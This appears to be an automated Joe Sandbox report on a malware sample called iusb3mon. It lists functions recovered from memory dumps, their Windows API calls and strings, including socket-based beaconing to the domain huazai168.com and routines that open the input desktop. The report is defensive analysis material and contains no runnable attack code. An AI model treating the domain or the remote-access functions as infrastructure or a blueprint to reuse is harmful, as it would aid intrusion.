Instruction ID: e6b6a81d7bd5b7d296d0e27e864909117cd148aa711aab41abe4b99633b4d132
Opcode Fuzzy Hash: bf68bbd4175c3b473f97dfd73cf951708670e1ca3bd7b2a4037c25dedd9446d8
Instruction Fuzzy Hash: E741DA71A00605DFD7109F65EC49BAEBFB8FB44720F248229F90DE7241E7749804E7A5

Function 04D31891 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04D31896

Strings

g, xrefs: 04D3190C
q, xrefs: 04D31920
, xrefs: 04D3192C
y, xrefs: 04D3191C
x, xrefs: 04D31928
h, xrefs: 04D31924
m, xrefs: 04D31914
8, xrefs: 04D31910
k, xrefs: 04D31918

Memory Dump Source

Source File: 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d30000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: $8$g$h$k$m$q$x$y
API String ID: 3519838083-2346024814
Opcode ID: 62c5fbcb160e6cc2404c204164438830c7ace46b45df545fd289de1eca745842
Instruction ID: dd217b2bc8ee11e047aa931c0ddf57aadc2549e4b5f14f5fade8a242be590770
Opcode Fuzzy Hash: 62c5fbcb160e6cc2404c204164438830c7ace46b45df545fd289de1eca745842
Instruction Fuzzy Hash: C32192709043859EE711DBE8C8497EEBFF89F11308F04455EE082A7282D7B56608C772

Function 04D774E9 Relevance: 16.5, APIs: 2, Strings: 9, Instructions: 37stringCOMMON

Download Yara Rule

APIs

Part of subcall function 04D7739A: wsprintfA.USER32 ref: 04D77480

lstrlenA.KERNEL32(00000080,?,?,00000000,?), ref: 04D77532
lstrlenA.KERNEL32(00000080,?,?,00000000,?), ref: 04D7754A

Strings

e, xrefs: 04D7751F
i, xrefs: 04D77517
k, xrefs: 04D7750F
r, xrefs: 04D7750B
T, xrefs: 04D77513
a, xrefs: 04D77507
m, xrefs: 04D7751B
M, xrefs: 04D77503
MarkTime, xrefs: 04D774F4, 04D774FB

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: lstrlen$wsprintf
String ID: M$MarkTime$T$a$e$i$k$m$r
API String ID: 1220175532-2269700615
Opcode ID: 21e0026abe16c02c9dbf1d5bb84533b7d935b614b2e4dea9e3c8bf594473d7f8
Instruction ID: 6113e5cbd5c62f9b1f207a51b73fb0b2b404549e39908e57f567206a4bba4bc6
Opcode Fuzzy Hash: 21e0026abe16c02c9dbf1d5bb84533b7d935b614b2e4dea9e3c8bf594473d7f8
Instruction Fuzzy Hash: 0D018B10E042C8F9DF01A7A5C849B9E7FB99F52708F0480D9D95067282D3BA6619C772

Function 00578D60 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00578D97
___except_validate_context_record.LIBVCRUNTIME ref: 00578D9F
_ValidateLocalCookies.LIBCMT ref: 00578E28
__IsNonwritableInCurrentImage.LIBCMT ref: 00578E53
_ValidateLocalCookies.LIBCMT ref: 00578EA8
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00578EBE
___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00578ED3

Strings

csm, xrefs: 00578E3D
vmW, xrefs: 00578E45, 00578E4E, 00578E5F

Memory Dump Source

Source File: 00000020.00000002.4542770236.0000000000571000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00570000, based on PE: true

Associated: 00000020.00000002.4542552949.0000000000570000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4542911854.000000000058E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543102062.000000000059C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.000000000059E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005A2000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005E3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543915174.00000000005FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.00000000005FB000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.000000000063F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000655000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006CA000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006D5000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006DF000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006E1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006F7000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000741000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4545109642.00000000009D9000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_570000_iusb3mon.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
String ID: csm$vmW
API String ID: 1385549066-4157201330
Opcode ID: 50fa5c50552f0ebfbafe427b1940432924baabcbce8bd85bacbd98f3a28d824c
Instruction ID: 75b1f13ed34b710e7a798841a25009660567e946e84464f3b5f3a7da62cb0490
Opcode Fuzzy Hash: 50fa5c50552f0ebfbafe427b1940432924baabcbce8bd85bacbd98f3a28d824c
Instruction Fuzzy Hash: C841A434A002099BCF10DF68E88DAAEBFB5BF45314F14C155EC189B292DB319D05EBA1

Function 04D754A3 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 118sleepstringsynchronizationCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04D754A8

Part of subcall function 04D712D2: __EH_prolog.LIBCMT ref: 04D712D7
Part of subcall function 04D712D2: WSAStartup.WS2_32(00000202,?), ref: 04D71328
Part of subcall function 04D712D2: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 04D71333

lstrcatA.KERNEL32(?,04D9CA18), ref: 04D754F7
_rand.LIBCMT ref: 04D75503
Sleep.KERNEL32(00000BB8), ref: 04D7550D
GetTickCount.KERNEL32 ref: 04D7553D
GetTickCount.KERNEL32 ref: 04D75559
WaitForSingleObject.KERNEL32(?,00000064), ref: 04D755DF
Sleep.KERNEL32(000001F4), ref: 04D755EC

Part of subcall function 04D7180D: setsockopt.WS2_32(?,0000FFFF,00000080,04D7546D,00000004), ref: 04D71832
Part of subcall function 04D7180D: CancelIo.KERNEL32(?), ref: 04D7183B
Part of subcall function 04D7180D: InterlockedExchange.KERNEL32(?,00000000), ref: 04D71847
Part of subcall function 04D7180D: closesocket.WS2_32(?), ref: 04D71850
Part of subcall function 04D7180D: SetEvent.KERNEL32(?), ref: 04D71859

Part of subcall function 04D71AD3: __EH_prolog.LIBCMT ref: 04D71AD8
Part of subcall function 04D71AD3: TerminateThread.KERNEL32(?,000000FF,00000000,00000000,00006365,?,04D75486), ref: 04D71B00
Part of subcall function 04D71AD3: CloseHandle.KERNEL32(?,?,04D75486), ref: 04D71B08

Strings

huazai168.com, xrefs: 04D75574

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog$CountEventSleepTick$CancelCloseCreateExchangeHandleInterlockedObjectSingleStartupTerminateThreadWait_randclosesocketlstrcatsetsockopt
String ID: huazai168.com
API String ID: 2260043707-2241639779
Opcode ID: e8b387fa54d908202476f3b73404960890481fd688cdb089189ae0dca8815855
Instruction ID: cb44663ed4f06c7d55c0c498395ed9a7170350b0d38317e8c814c3b940599264
Opcode Fuzzy Hash: e8b387fa54d908202476f3b73404960890481fd688cdb089189ae0dca8815855
Instruction Fuzzy Hash: EF419572E00259ABEB14EFA4DC64BDDBB79EF05358F000295D509A7680FF74AE85CB21

Function 04D73568 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 114stringCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(CTXOPConntion_Class,00000000), ref: 04D735CF
GetClassNameA.USER32(?,00000000,00000104), ref: 04D73602
GetWindowTextA.USER32(?,?,00000104), ref: 04D7362B
lstrlenA.KERNEL32(?), ref: 04D73662
GetWindow.USER32(?,00000002), ref: 04D73691
lstrlenA.KERNEL32(?), ref: 04D7369F

Strings

-/-, xrefs: 04D736AC
_, xrefs: 04D7363F
CTXOPConntion_Class, xrefs: 04D735C6, 04D735CD, 04D7360E

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Window$lstrlen$ClassFindNameText
String ID: -/-$CTXOPConntion_Class$_
API String ID: 4118851945-591102176
Opcode ID: 0b9f3a557ff592599fd07e575ec7534448b73c1614cc9ef04fc761eb96f86a0f
Instruction ID: befc1abc9a90cc867b8109864ef46ea77720ea3f3139866f3822e9234ccd5851
Opcode Fuzzy Hash: 0b9f3a557ff592599fd07e575ec7534448b73c1614cc9ef04fc761eb96f86a0f
Instruction Fuzzy Hash: DE319172A04118BEFF15ABA4DC45BDE7BB9EB04304F1084E5E604E2191EB70BE849F54

Function 04D89390 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04D89395
GetPropA.USER32(?,AfxOldWndProc423), ref: 04D893AD
CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 04D8940B

Part of subcall function 04D88F78: GetWindowRect.USER32(?,?), ref: 04D88F9D
Part of subcall function 04D88F78: GetWindow.USER32(?,00000004), ref: 04D88FBA

SetWindowLongA.USER32(?,000000FC,?), ref: 04D8943B
RemovePropA.USER32(?,AfxOldWndProc423), ref: 04D89443
GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 04D8944A
GlobalDeleteAtom.KERNEL32(00000000), ref: 04D89451

Part of subcall function 04D88F55: GetWindowRect.USER32(?,?), ref: 04D88F61

CallWindowProcA.USER32(?,?,?,?,00000000), ref: 04D894A5

Strings

AfxOldWndProc423, xrefs: 04D893A3, 04D893AB, 04D89441, 04D89449

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
String ID: AfxOldWndProc423
API String ID: 2397448395-1060338832
Opcode ID: 12a35f3087740eee1a7ca69c9483f9ba6fae4ab4fa47dfdf99e55ceae0ba82ff
Instruction ID: 753331142748258ae3ebabfc08e4c08af85d10346fe4f17255e22724550720a9
Opcode Fuzzy Hash: 12a35f3087740eee1a7ca69c9483f9ba6fae4ab4fa47dfdf99e55ceae0ba82ff
Instruction Fuzzy Hash: BF3157B290021ABBEF01BFB8DD58EBF7BB9EF09311F00052DF545A1250D739A9109BA5

Function 04D8C5BA Relevance: 15.1, APIs: 10, Instructions: 99memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0000001C,04DA6588,00000100,?,00000000,00000000,04D8C863,?,00000100,04D8C48E,04D8C4D2,04D887DA,00000100,04D88773,?,?), ref: 04D8C5C9
GlobalAlloc.KERNEL32(00002002,?,?,?,00000000,00000000,04D8C863,?,00000100,04D8C48E,04D8C4D2,04D887DA,00000100,04D88773,?,?), ref: 04D8C61E
GlobalHandle.KERNEL32(?), ref: 04D8C627
GlobalUnlock.KERNEL32(00000000), ref: 04D8C630
GlobalReAlloc.KERNEL32(00000000,?,00002002), ref: 04D8C642
GlobalHandle.KERNEL32(?), ref: 04D8C659
GlobalLock.KERNEL32(00000000), ref: 04D8C660
LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,04D8C863,?,00000100,04D8C48E,04D8C4D2,04D887DA,00000100,04D88773,?,?,00000100), ref: 04D8C666
GlobalLock.KERNEL32(?), ref: 04D8C675
LeaveCriticalSection.KERNEL32(?), ref: 04D8C6BE

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
String ID:
API String ID: 2667261700-0
Opcode ID: 06ad63081f96291dc30e49adeefdb45aa5f50c76e5c17764aca7adc0b220d9a1
Instruction ID: 082690655d2ea6cff5006c37e1c123c4150cebce6c9f65f7de9ee87f78773d98
Opcode Fuzzy Hash: 06ad63081f96291dc30e49adeefdb45aa5f50c76e5c17764aca7adc0b220d9a1
Instruction Fuzzy Hash: AC314F75220705AFE724AF28DC99A3AB7E9FB85701B01492DE856D3661E775FC04CB20

Function 04D3DC56 Relevance: 14.5, APIs: 2, Strings: 6, Instructions: 469COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 04D3E058
__aulldiv.LIBCMT ref: 04D3E06A

Strings

@, xrefs: 04D3DFD1
9, xrefs: 04D3E06F
g, xrefs: 04D3DDE7
g, xrefs: 04D3DE70
', xrefs: 04D3DED0
, xrefs: 04D3E0DF

Memory Dump Source

Source File: 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d30000_iusb3mon.jbxd

Yara matches

Similarity

API ID: __aulldiv__aullrem
String ID: $'$9$@$g$g
API String ID: 3839614884-2311196974
Opcode ID: 623da7cb9067cec10be50fd8bcdce45f781f768c5608f194e8465b0d7b52ac49
Instruction ID: 87a4afe361014ccc333b983d3652b7e1ab74097b285e1ac44eee75403fd87f6e
Opcode Fuzzy Hash: 623da7cb9067cec10be50fd8bcdce45f781f768c5608f194e8465b0d7b52ac49
Instruction Fuzzy Hash: 0C029071E05249EEEF14CFA8C9487EDBBB6FF04306F14805AE850A62C1E774AA45CF60

Function 04D73777 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82filelibraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 04D73788
CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 04D737B8
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 04D737D1
GetFileSize.KERNEL32(00000000,00000000), ref: 04D737D9
_rand.LIBCMT ref: 04D7381A
WriteFile.KERNEL32(?,?,00000400,?,00000000), ref: 04D7384F
CloseHandle.KERNEL32(?), ref: 04D73860

Strings

KERNEL32.dll, xrefs: 04D73783

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleLibraryLoadPointerSizeWrite_rand
String ID: KERNEL32.dll
API String ID: 2551126021-254546324
Opcode ID: 5dbc9f969f71f7938dca2f4f7b3e54c19265f5f08e6ab2d045c3ce74fcb5d385
Instruction ID: 504b0096ee4feed7fd9b413ee6cea7bdb7202f14fff7bc8d6cbace2e721ac120
Opcode Fuzzy Hash: 5dbc9f969f71f7938dca2f4f7b3e54c19265f5f08e6ab2d045c3ce74fcb5d385
Instruction Fuzzy Hash: 2D21B2B1900218FFDB109F68D894ABE7B79EB44784F108169FB15A6280D7381E46DF54

Function 04D78EF1 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 79libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,?,?,?,?,?,?,?,?,?,00000000,04D7ADE0,04D8E518,000000FF,?,04D78D0F), ref: 04D78F19
GetProcAddress.KERNEL32(?,OpenInputDesktop), ref: 04D78F74
GetProcAddress.KERNEL32(?,OpenDesktopA), ref: 04D78F81
GetProcAddress.KERNEL32(?,CloseDesktop), ref: 04D78F8D

Strings

CloseDesktop, xrefs: 04D78F85
OpenDesktopA, xrefs: 04D78F79
user32.dll, xrefs: 04D78F14
OpenInputDesktop, xrefs: 04D78F67, 04D78F6A

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseDesktop$OpenDesktopA$OpenInputDesktop$user32.dll
API String ID: 2238633743-3711086354
Opcode ID: fefd132c372931b12f5533f173f37d4b1f3244177fad4109407b7f2e0fd2ab5a
Instruction ID: 277e013c7a8b731b900cdc687a1734fdaf10b54409282c8621553ebca2ba4620
Opcode Fuzzy Hash: fefd132c372931b12f5533f173f37d4b1f3244177fad4109407b7f2e0fd2ab5a
Instruction Fuzzy Hash: D6318D70D082C8EEEF11DBA8D8487DDBFF5AB16758F14016AE400B6291D7BA1D08CB71

Function 04D72A59 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 61filestringCOMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000,?,?), ref: 04D72A71
CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 04D72AC4
GetFileSize.KERNEL32(00000000,00000000), ref: 04D72AD1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 04D72AE3
lstrlenA.KERNEL32(04D72DCE,?,00000000), ref: 04D72AF1
WriteFile.KERNEL32(00000000,04D72DCE,00000000), ref: 04D72AFC
CloseHandle.KERNEL32(00000000), ref: 04D72B03

Strings

.dat, xrefs: 04D72A9F

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$CloseCreateFolderHandlePathPointerSizeSpecialWritelstrlen
String ID: .dat
API String ID: 2901490279-100240174
Opcode ID: aae720f16c1627b173ae25f5cfcdc004f5030ea435ee0d3c3273644d433cb363
Instruction ID: 021fe79473d9e2c7349918396664ca0ee86101c7bf5c054119f42a60f4dc6f3f
Opcode Fuzzy Hash: aae720f16c1627b173ae25f5cfcdc004f5030ea435ee0d3c3273644d433cb363
Instruction Fuzzy Hash: 5F119E71651128BBEB20AAA09C09FEF3F6CEB45754F004054F645E1140DB78AE858EA0

Function 04D82698 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,04D80AB7,?,Microsoft Visual C++ Runtime Library,00012010,?,04D8EAEC,?,04D8EB3C,?,?,?,Runtime Error!Program: ), ref: 04D826AA
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 04D826C2
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 04D826D3
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 04D826E0

Strings

GetActiveWindow, xrefs: 04D826CD
MessageBoxA, xrefs: 04D826BC
GetLastActivePopup, xrefs: 04D826D5
user32.dll, xrefs: 04D826A5

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
API String ID: 2238633743-4044615076
Opcode ID: 9e13b6040b93922222e77643a0645f787071d361062cef81eb888cc448ed8671
Instruction ID: 08738d683a09397a3ef07376dde4ca19aa9280b8002e0cfd640d7662d4bc5d87
Opcode Fuzzy Hash: 9e13b6040b93922222e77643a0645f787071d361062cef81eb888cc448ed8671
Instruction Fuzzy Hash: E6012C31B00311EF9B11EFB69C95A7A7BE8FA88791308046DF545D2211DB79E8169F60

Function 04D8AFEE Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,04D8B2E8,?,00020000), ref: 04D8AFF7
LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 04D8B000
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 04D8B014
#17.COMCTL32 ref: 04D8B02F
#17.COMCTL32 ref: 04D8B04B
FreeLibrary.KERNEL32(00000000), ref: 04D8B057

Strings

COMCTL32.DLL, xrefs: 04D8AFF0, 04D8AFF6, 04D8AFFD
InitCommonControlsEx, xrefs: 04D8B00C

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeHandleLoadModuleProc
String ID: COMCTL32.DLL$InitCommonControlsEx
API String ID: 1437655972-4218389149
Opcode ID: d4a5c2276fb1e665a3b3d41dd837f619ec08187869c9bac1001a1ca56b129176
Instruction ID: e10f29e09579d3ac5cdf19718c45672d9673825cba21a4a00e45374f8ff87c80
Opcode Fuzzy Hash: d4a5c2276fb1e665a3b3d41dd837f619ec08187869c9bac1001a1ca56b129176
Instruction Fuzzy Hash: 3AF0A432B102229B9721FEA4AC88A3E77ACFB85661715082EF561E3300DB24FC058B65

Function 04D8322A Relevance: 13.7, APIs: 9, Instructions: 221COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,04D8E7F0,00000001,04D8E7F0,00000001,00000000,06D3117C,04D7AA00,00000000,?,?,?,04D7EA70,?,0000000C), ref: 04D83268
CompareStringA.KERNEL32(00000000,00000000,04DA6150,00000001,04DA6150,00000001,?,?,?,04D7EA70,?,0000000C), ref: 04D83285
CompareStringA.KERNEL32(?,?,00000000,?,0000000C,?,00000000,06D3117C,04D7AA00,00000000,?,?,?,04D7EA70,?,0000000C), ref: 04D832E3
GetCPInfo.KERNEL32(04D7EA70,00000000,00000000,06D3117C,04D7AA00,00000000,?,?,?,04D7EA70,?,0000000C), ref: 04D83334
MultiByteToWideChar.KERNEL32(04D7EA70,00000009,00000000,?,00000000,00000000,?,?,?,04D7EA70,?,0000000C), ref: 04D833B3
MultiByteToWideChar.KERNEL32(04D7EA70,00000001,00000000,?,?,?,?,?,?,04D7EA70,?,0000000C), ref: 04D83414
MultiByteToWideChar.KERNEL32(04D7EA70,00000009,0000000C,?,00000000,00000000,?,?,?,04D7EA70,?,0000000C), ref: 04D83427
MultiByteToWideChar.KERNEL32(04D7EA70,00000001,0000000C,?,?,00000000,?,?,?,04D7EA70,?,0000000C), ref: 04D83473
CompareStringW.KERNEL32(?,?,?,?,?,00000000,?,00000000,?,?,?,04D7EA70,?,0000000C), ref: 04D8348B

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
